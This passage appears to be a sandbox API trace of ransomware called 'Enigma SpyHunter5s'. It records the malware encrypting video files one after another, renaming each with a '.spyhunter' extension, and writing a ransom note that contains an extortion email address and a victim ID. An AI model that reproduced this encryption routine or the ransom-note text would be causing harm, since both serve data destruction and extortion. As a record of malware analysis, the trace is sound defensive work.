pdwDataLen=0x25cedd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedd0*=0x30) returned 1 [0147.489] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\nmyLW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\nmylw.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.489] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\nmyLW.swf") returned 70 [0147.489] StrStrW (lpFirst="nmyLW.swf", lpSrch=".txt") returned 0x0 [0147.489] GetProcessHeap () returned 0x2c0000 [0147.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.489] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced94*=0x2800, lpOverlapped=0x0) returned 1 [0147.490] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.490] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced94*=0x2800, lpOverlapped=0x0) returned 1 [0147.490] GetProcessHeap () returned 0x2c0000 [0147.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.490] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.490] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x25cedd4*, lpNumberOfBytesWritten=0x25ced94*=0x4, lpOverlapped=0x0) returned 1 [0147.491] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced94*=0x30, lpOverlapped=0x0) returned 1 [0147.491] CloseHandle (hObject=0xa0) returned 1 [0147.491] GetProcessHeap () returned 0x2c0000 [0147.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.491] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\nmyLW.swf.spyhunter") returned 80 [0147.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\nmyLW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\nmylw.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\nmyLW.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\nmylw.swf.spyhunter")) returned 1 [0147.492] GetProcessHeap () returned 0x2c0000 [0147.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.492] GetProcessHeap () returned 0x2c0000 [0147.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.492] GetProcessHeap () returned 0x2c0000 [0147.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee3f8 | out: hHeap=0x2c0000) returned 1 [0147.492] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedd0 | out: pbBuffer=0x25cedd0) returned 1 [0147.492] GetProcessHeap () returned 0x2c0000 [0147.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.492] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedc8*=0x30) returned 1 [0147.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\MjpW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\mjpw.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\MjpW.swf") returned 69 [0147.493] StrStrW (lpFirst="MjpW.swf", lpSrch=".txt") returned 0x0 [0147.493] GetProcessHeap () returned 0x2c0000 [0147.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.493] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.494] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.494] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.494] GetProcessHeap () returned 0x2c0000 [0147.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.494] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.494] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x25cedcc*, lpNumberOfBytesWritten=0x25ced8c*=0x4, lpOverlapped=0x0) returned 1 [0147.494] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced8c*=0x30, lpOverlapped=0x0) returned 1 [0147.494] CloseHandle (hObject=0xa0) returned 1 [0147.494] GetProcessHeap () returned 0x2c0000 [0147.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.494] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\MjpW.swf.spyhunter") returned 79 [0147.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\MjpW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\mjpw.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\MjpW.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\mjpw.swf.spyhunter")) returned 1 [0147.495] GetProcessHeap () returned 0x2c0000 [0147.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.495] GetProcessHeap () returned 0x2c0000 [0147.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.495] GetProcessHeap () returned 0x2c0000 [0147.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee320 | out: hHeap=0x2c0000) returned 1 [0147.496] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedd0 | out: pbBuffer=0x25cedd0) returned 1 [0147.496] GetProcessHeap () returned 0x2c0000 [0147.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.496] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedc8*=0x30) returned 1 [0147.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\mAiDlqeOLVfzwDMG2J6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\maidlqeolvfzwdmg2j6.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\mAiDlqeOLVfzwDMG2J6.avi") returned 84 [0147.496] StrStrW (lpFirst="mAiDlqeOLVfzwDMG2J6.avi", lpSrch=".txt") returned 0x0 [0147.496] GetProcessHeap () returned 0x2c0000 [0147.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.497] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.497] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.497] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced8c*=0x2800, lpOverlapped=0x0) returned 1 [0147.497] GetProcessHeap () returned 0x2c0000 [0147.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.498] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.498] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x25cedcc*, lpNumberOfBytesWritten=0x25ced8c*=0x4, lpOverlapped=0x0) returned 1 [0147.498] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced8c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced8c*=0x30, lpOverlapped=0x0) returned 1 [0147.498] CloseHandle (hObject=0xa0) returned 1 [0147.498] GetProcessHeap () returned 0x2c0000 [0147.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.498] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\mAiDlqeOLVfzwDMG2J6.avi.spyhunter") returned 94 [0147.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\mAiDlqeOLVfzwDMG2J6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\maidlqeolvfzwdmg2j6.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\mAiDlqeOLVfzwDMG2J6.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\maidlqeolvfzwdmg2j6.avi.spyhunter")) returned 1 [0147.499] GetProcessHeap () returned 0x2c0000 [0147.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.499] GetProcessHeap () returned 0x2c0000 [0147.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.499] GetProcessHeap () returned 0x2c0000 [0147.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39700 | out: hHeap=0x2c0000) returned 1 [0147.499] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedc8 | out: pbBuffer=0x25cedc8) returned 1 [0147.499] GetProcessHeap () returned 0x2c0000 [0147.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.499] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedc0*=0x30) returned 1 [0147.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\HAtc3id116f-hFz3i.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\hatc3id116f-hfz3i.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.500] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\HAtc3id116f-hFz3i.mp4") returned 82 [0147.500] StrStrW (lpFirst="HAtc3id116f-hFz3i.mp4", lpSrch=".txt") returned 0x0 [0147.500] GetProcessHeap () returned 0x2c0000 [0147.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.500] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced84*=0x2800, lpOverlapped=0x0) returned 1 [0147.501] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.501] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced84*=0x2800, lpOverlapped=0x0) returned 1 [0147.501] GetProcessHeap () returned 0x2c0000 [0147.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.501] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.501] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced84, lpOverlapped=0x0 | out: lpBuffer=0x25cedc4*, lpNumberOfBytesWritten=0x25ced84*=0x4, lpOverlapped=0x0) returned 1 [0147.501] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced84, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced84*=0x30, lpOverlapped=0x0) returned 1 [0147.501] CloseHandle (hObject=0xa0) returned 1 [0147.502] GetProcessHeap () returned 0x2c0000 [0147.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.503] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\HAtc3id116f-hFz3i.mp4.spyhunter") returned 92 [0147.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\HAtc3id116f-hFz3i.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\hatc3id116f-hfz3i.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\HAtc3id116f-hFz3i.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\hatc3id116f-hfz3i.mp4.spyhunter")) returned 1 [0147.503] GetProcessHeap () returned 0x2c0000 [0147.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.504] GetProcessHeap () returned 0x2c0000 [0147.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.504] GetProcessHeap () returned 0x2c0000 [0147.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f648a8 | out: hHeap=0x2c0000) returned 1 [0147.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.504] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.504] WriteFile (in: hFile=0xa0, lpBuffer=0x25cecfb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x25cecfb*, lpNumberOfBytesWritten=0x25cee24*=0x127, lpOverlapped=0x0) returned 1 [0147.505] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.505] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cee24, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cee24*=0x2ac, lpOverlapped=0x0) returned 1 [0147.505] CloseHandle (hObject=0xa0) returned 1 [0147.505] GetProcessHeap () returned 0x2c0000 [0147.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61f60 | out: hHeap=0x2c0000) returned 1 [0147.506] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedc0 | out: pbBuffer=0x25cedc0) returned 1 [0147.506] GetProcessHeap () returned 0x2c0000 [0147.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.506] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedb8*=0x30) returned 1 [0147.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\pdZvd6uq0_rBNkRer.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\pdzvd6uq0_rbnkrer.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\pdZvd6uq0_rBNkRer.swf") returned 97 [0147.506] StrStrW (lpFirst="pdZvd6uq0_rBNkRer.swf", lpSrch=".txt") returned 0x0 [0147.506] GetProcessHeap () returned 0x2c0000 [0147.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.506] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ced7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.507] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.507] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ced7c*=0x2800, lpOverlapped=0x0) returned 1 [0147.507] GetProcessHeap () returned 0x2c0000 [0147.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.507] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.508] WriteFile (in: hFile=0xa0, lpBuffer=0x25cedbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x25cedbc*, lpNumberOfBytesWritten=0x25ced7c*=0x4, lpOverlapped=0x0) returned 1 [0147.508] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced7c*=0x30, lpOverlapped=0x0) returned 1 [0147.508] CloseHandle (hObject=0xa0) returned 1 [0147.508] GetProcessHeap () returned 0x2c0000 [0147.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.508] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\pdZvd6uq0_rBNkRer.swf.spyhunter") returned 107 [0147.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\pdZvd6uq0_rBNkRer.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\pdzvd6uq0_rbnkrer.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\pdZvd6uq0_rBNkRer.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\pdzvd6uq0_rbnkrer.swf.spyhunter")) returned 1 [0147.509] GetProcessHeap () returned 0x2c0000 [0147.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.509] GetProcessHeap () returned 0x2c0000 [0147.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.509] GetProcessHeap () returned 0x2c0000 [0147.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68128 | out: hHeap=0x2c0000) returned 1 [0147.509] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cedc0 | out: pbBuffer=0x25cedc0) returned 1 [0147.509] GetProcessHeap () returned 0x2c0000 [0147.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.509] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cedb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cedb8*=0x30) returned 1 [0147.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\dJ2Dgg.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\dj2dgg.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\dJ2Dgg.mp4") returned 86 [0147.510] StrStrW (lpFirst="dJ2Dgg.mp4", lpSrch=".txt") returned 0x0 [0147.510] GetProcessHeap () returned 0x2c0000 [0147.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 